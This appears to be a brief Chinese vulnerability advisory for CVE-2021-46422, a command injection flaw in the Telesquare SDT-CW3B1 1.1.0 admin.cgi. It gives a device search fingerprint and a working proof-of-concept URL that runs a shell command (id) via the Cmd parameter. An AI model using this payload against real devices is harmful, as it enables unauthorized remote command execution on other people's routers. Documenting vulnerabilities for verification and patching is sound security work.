Telesquare SDT-CW3B1 admin.cgi 远程命令执行漏洞 CVE-2021-46422

漏洞描述

Telesquare SDT-CW3B1 1.1.0版本中存在命令注入漏洞，攻击者通过漏洞可以获取服务器权限

漏洞影响

Telesquare SDT-CW3B1 1.1.0

网络测绘

app="SDT-CS3B1"

漏洞复现

登录页面

验证POC

/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id